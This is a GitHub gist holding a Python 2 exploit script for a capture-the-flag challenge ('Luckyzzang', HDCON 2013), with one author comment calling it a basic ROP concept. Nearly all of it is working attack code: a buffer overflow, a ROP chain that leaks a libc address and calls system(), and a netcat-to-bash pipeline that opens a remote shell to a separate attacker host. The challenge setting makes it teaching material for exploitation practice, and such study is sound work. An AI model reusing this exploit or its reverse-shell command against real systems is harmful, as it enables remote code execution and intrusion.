Skip to content

Instantly share code, notes, and snippets.

@AhnMo

AhnMo/luckyzzang.py

Created April 8, 2016 14:25
Show Gist options
  • Save AhnMo/9b0508c26e6cca46bad12c7dedcdc62a to your computer and use it in GitHub Desktop.
Save AhnMo/9b0508c26e6cca46bad12c7dedcdc62a to your computer and use it in GitHub Desktop.
Download ZIP
Raw
luckyzzang.py
#!/usr/bin/python
# Luckyzzang (HDCON 2013 Problem 5)
import socket, struct
p = lambda x: struct.pack('<L', x)
up = lambda x: struct.unpack('<L', x)[0]
command = 'nc 192.168.99.1 3334 | /bin/bash | nc 192.168.99.1 3333'
ppppr = p(0x080489cc)
sock_fd = p(4)
send_plt = p(0x08048610)
recv_plt = p(0x080485F0)
puts_plt = p()
puts_got = p()
buffer_size = 1032
HOST = '192.168.99.133'
PORT = 7777
puts_addr = 0xb759c190
'''
payload = send_plt + 'AAAA' + sock_fd + puts_got + p(4) + p(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print s.recv(6)
s.send('D' * (buffer_size + 4) + payload)
puts_addr = up(s.recv(4))
print 'puts_addr = 0x%08x' % puts_addr
s.close()
'''
system_addr = puts_addr + 0xb7e583b0 - 0xb7e7e190
print 'system_addr = 0x%08x' % system_addr
my_buf = puts_addr + 0x144e70 + 0x946
print 'my_buf = 0x%08x' % my_buf
payload = recv_plt + ppppr + sock_fd + puts_got + p(4) + p(0)
payload += recv_plt + ppppr + sock_fd + p(my_buf) + p(4) + p(0)
payload += send_plt + 'AAAA' + p(my_buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print s.recv(6)
s.send('D' * (buffer_size + 4) + payload)
print 'system_addr send'
s.send(p(system_addr))
print 'command send'
s.send(command + '\x00')
print 'wait recv'
print s.recv(1024)
s.close()
@AhnMo
Copy link
Author

AhnMo commented Apr 8, 2016

Basic ROP Concept(with recv, send on fork process)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment